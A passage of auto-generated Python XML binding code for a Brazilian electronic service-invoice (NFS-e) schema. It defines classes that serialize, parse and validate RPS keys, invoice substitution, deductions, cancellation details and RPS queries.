namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
# end class tpChaveRPS
class tpChaveSubstituicaoNFSe(GeneratedsSuper):
"""Chave de identificação para Substituição de uma NFSe."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, CPFCNPJTomador=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumero(self.NumeroNFSeSubstituida)
if isinstance(DataEmissaoNFSeSubstituida, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoNFSeSubstituida, '%Y-%m-%d').date()
else:
initvalue_ = DataEmissaoNFSeSubstituida
self.DataEmissaoNFSeSubstituida = initvalue_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveSubstituicaoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveSubstituicaoNFSe.subclass:
return tpChaveSubstituicaoNFSe.subclass(*args_, **kwargs_)
else:
return tpChaveSubstituicaoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpData(self, value):
# Validate type tpData, a restriction on xs:date.
if value is not None and Validate_simpletypes_:
pass
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.CPFCNPJTomador is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveSubstituicaoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveSubstituicaoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_format_date(self.DataEmissaoNFSeSubstituida, input_name='DataEmissaoNFSeSubstituida'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
sval_ = child_.text
dval_ = self.gds_parse_date(sval_)
self.DataEmissaoNFSeSubstituida = dval_
# validate type tpData
self.validate_tpData(self.DataEmissaoNFSeSubstituida)
# end class tpChaveSubstituicaoNFSe
class tpDeducoes(GeneratedsSuper):
"""Tipo deduções de nota fiscal."""
subclass = None
superclass = None
def __init__(self, DeducaoPor=None, TipoDeducao=None, CPFCNPJReferencia=None, NumeroNFReferencia=None, ValorTotalReferencia=None, PercentualDeduzir=None, ValorDeduzir=None):
self.original_tagname_ = None
self.DeducaoPor = DeducaoPor
self.validate_tpDeducaoPor(self.DeducaoPor)
self.TipoDeducao = TipoDeducao
self.validate_tpTipoDeducao(self.TipoDeducao)
self.CPFCNPJReferencia = CPFCNPJReferencia
self.validate_tpCPFCNPJnulo(self.CPFCNPJReferencia)
self.NumeroNFReferencia = NumeroNFReferencia
self.validate_tpNumeroNFReferencia(self.NumeroNFReferencia)
self.ValorTotalReferencia = ValorTotalReferencia
self.validate_tpValor(self.ValorTotalReferencia)
self.PercentualDeduzir = PercentualDeduzir
self.validate_tpPercentual(self.PercentualDeduzir)
self.ValorDeduzir = ValorDeduzir
self.validate_tpValor(self.ValorDeduzir)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpDeducoes)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpDeducoes.subclass:
return tpDeducoes.subclass(*args_, **kwargs_)
else:
return tpDeducoes(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpDeducaoPor(self, value):
# Validate type tpDeducaoPor, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['Valor', 'Percentual']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpDeducaoPor' % {"value" : value.encode("utf-8")} )
def validate_tpTipoDeducao(self, value):
# Validate type tpTipoDeducao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['Despesas com Materiais', 'Despesas com Subempreitada', 'Despesas com Mercadorias', 'Servicos de Veiculacao e Divulgacao', 'Servicos', 'Mapa de Const. Civil', '']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoDeducao' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def validate_tpNumeroNFReferencia(self, value):
# Validate type tpNumeroNFReferencia, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroNFReferencia' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumeroNFReferencia_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumeroNFReferencia_patterns_, ))
validate_tpNumeroNFReferencia_patterns_ = [['^[0-9]{1,10}$']]
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpPercentual(self, value):
# Validate type tpPercentual, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpPercentual' % {"value" : value} )
if len(str(value)) >= 5:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpPercentual' % {"value" : value} )
def hasContent_(self):
if (
self.DeducaoPor is not None or
self.TipoDeducao is not None or
self.CPFCNPJReferencia is not None or
self.NumeroNFReferencia is not None or
self.ValorTotalReferencia is not None or
self.PercentualDeduzir is not None or
self.ValorDeduzir is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpDeducoes', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpDeducoes')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpDeducoes')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpDeducoes', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpDeducoes'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpDeducoes', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.DeducaoPor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DeducaoPor>%s</ns1:DeducaoPor>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DeducaoPor), input_name='DeducaoPor')), eol_))
if self.TipoDeducao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoDeducao>%s</ns1:TipoDeducao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoDeducao), input_name='TipoDeducao')), eol_))
if self.CPFCNPJReferencia is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJReferencia>%s</ns1:CPFCNPJReferencia>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJReferencia), input_name='CPFCNPJReferencia')), eol_))
if self.NumeroNFReferencia is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFReferencia>%s</ns1:NumeroNFReferencia>%s' % (self.gds_format_integer(self.NumeroNFReferencia, input_name='NumeroNFReferencia'), eol_))
if self.ValorTotalReferencia is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotalReferencia>%s</ns1:ValorTotalReferencia>%s' % (self.gds_format_float(self.ValorTotalReferencia, input_name='ValorTotalReferencia'), eol_))
if self.PercentualDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:PercentualDeduzir>%s</ns1:PercentualDeduzir>%s' % (self.gds_format_float(self.PercentualDeduzir, input_name='PercentualDeduzir'), eol_))
if self.ValorDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorDeduzir>%s</ns1:ValorDeduzir>%s' % (self.gds_format_float(self.ValorDeduzir, input_name='ValorDeduzir'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'DeducaoPor':
DeducaoPor_ = child_.text
DeducaoPor_ = self.gds_validate_string(DeducaoPor_, node, 'DeducaoPor')
self.DeducaoPor = DeducaoPor_
# validate type tpDeducaoPor
self.validate_tpDeducaoPor(self.DeducaoPor)
elif nodeName_ == 'TipoDeducao':
TipoDeducao_ = child_.text
TipoDeducao_ = self.gds_validate_string(TipoDeducao_, node, 'TipoDeducao')
self.TipoDeducao = TipoDeducao_
# validate type tpTipoDeducao
self.validate_tpTipoDeducao(self.TipoDeducao)
elif nodeName_ == 'CPFCNPJReferencia':
CPFCNPJReferencia_ = child_.text
CPFCNPJReferencia_ = self.gds_validate_string(CPFCNPJReferencia_, node, 'CPFCNPJReferencia')
self.CPFCNPJReferencia = CPFCNPJReferencia_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJReferencia)
elif nodeName_ == 'NumeroNFReferencia':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFReferencia')
self.NumeroNFReferencia = ival_
# validate type tpNumeroNFReferencia
self.validate_tpNumeroNFReferencia(self.NumeroNFReferencia)
elif nodeName_ == 'ValorTotalReferencia':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalReferencia')
self.ValorTotalReferencia = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalReferencia)
elif nodeName_ == 'PercentualDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'PercentualDeduzir')
self.PercentualDeduzir = fval_
# validate type tpPercentual
self.validate_tpPercentual(self.PercentualDeduzir)
elif nodeName_ == 'ValorDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorDeduzir')
self.ValorDeduzir = fval_
# validate type tpValor
self.validate_tpValor(self.ValorDeduzir)
# end class tpDeducoes
class tpNotaCancelamentoNFSe(GeneratedsSuper):
"""Tipo Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroNota=None, CodigoVerificacao=None, MotivoCancelamento=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.MotivoCancelamento = MotivoCancelamento
self.validate_tpMotCancelamento(self.MotivoCancelamento)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotaCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotaCancelamentoNFSe.subclass:
return tpNotaCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpNotaCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroNota is not None or
self.CodigoVerificacao is not None or
self.MotivoCancelamento is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotaCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotaCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotaCancelamentoNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotaCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.MotivoCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotivoCancelamento>%s</ns1:MotivoCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotivoCancelamento), input_name='MotivoCancelamento')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'MotivoCancelamento':
MotivoCancelamento_ = child_.text
MotivoCancelamento_ = self.gds_validate_string(MotivoCancelamento_, node, 'MotivoCancelamento')
self.MotivoCancelamento = MotivoCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotivoCancelamento)
# end class tpNotaCancelamentoNFSe
class tpDetalhesConsultaRPS(GeneratedsSuper):
"""Tipo Detalhes da Consulta de RPS."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, SerieRPS=None, NumeroRPS=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpDetalhesConsultaRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpDetalhesConsultaRPS.subclass:
return tpDetalhesConsultaRPS.subclass(*args_, **kwargs_)
else:
return tpDetalhesConsultaRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
